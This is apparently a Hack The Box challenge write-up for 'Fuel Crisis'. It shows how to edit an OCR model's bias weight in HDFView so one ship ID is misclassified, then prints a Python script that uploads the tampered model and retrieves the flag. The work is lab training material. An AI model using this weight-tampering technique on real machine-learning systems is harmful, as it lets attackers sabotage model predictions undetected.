Post

HackTheBox Fuel Crisis Writeup

Posted
By x3ric
2 min read

Explore the basics of cybersecurity in the Fuel Crisis Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/741

Description

After travelling for too many light years, we managed to reach an uninhabited planet to rest for a while. We got a problem though. Phalcon is running out of fuel and we need to stop at the nearest space station to refuel. The closest one is the B1-4S3D station, where we are unfortunately banned from docking our ship. Our surveillance showed that the station uses two OCR cameras to read the unique ID of each spaceship entering. The first one is used as a validator for the second one. We’ve managed to find a way to disable the validation process for a split second while our ship passes, but we still need to pass through the second camera. Furthermore, our lead hacker opened a connection with the second camera, which we can use to upload our custom model weights. Try to find a way to change the predictions of the model when we pass through the second gate. Be careful though, the other four spaceships that are in front of us need to be ID’d correctly so no suspicion raises.

Exploitation

Right-click in HDFView, reload as read-write, double-click the bias in Dense 2, set it to -100.0, and save the changes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

import requests
from bs4 import BeautifulSoup
import argparse

def main(server_address):
    try:
        ip, port = server_address.split(':')
    except ValueError:
        print("Error: Please provide the server address in the format ip:port")
        return
    url = f"http://{ip}:{port}/"
    files = {'file': open('model.h5', 'rb')}
    try:
        response = requests.post(url, files=files)
        print(" > Uploaded payload model weights...")
    except requests.exceptions.RequestException as e:
        print(f"Failed to upload payload: {e}")
        return
    try:
        response = requests.post(url + "dock")
        print(" > Docking ship...")
    except requests.exceptions.RequestException as e:
        print(f"Failed to dock ship: {e}")
        return
    soup = BeautifulSoup(response.text, features="lxml")
    flag = soup.find('p')
    print(" > Got flag...")
    print(f" > {flag.text}")
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Send a file and retrieve a flag from a server.")
    parser.add_argument("server_address", help="Server address in the format ip:port")
    args = parser.parse_args()
    main(args.server_address)

Summary

The Fuel Crisis Challenge on Hack The Box is an easy-level, beginner-friendly challenge that focuses on encryption reversal, file handling, and basic server interactions. It involves modifying a model’s bias using HDFView and utilizing a Python script to upload a payload, dock a ship, and extract a flag from the server response, offering a practical introduction to common CTF cybersecurity techniques.

challenge
htb challenge writeup linux ai
This post is licensed under CC BY 4.0 by the author.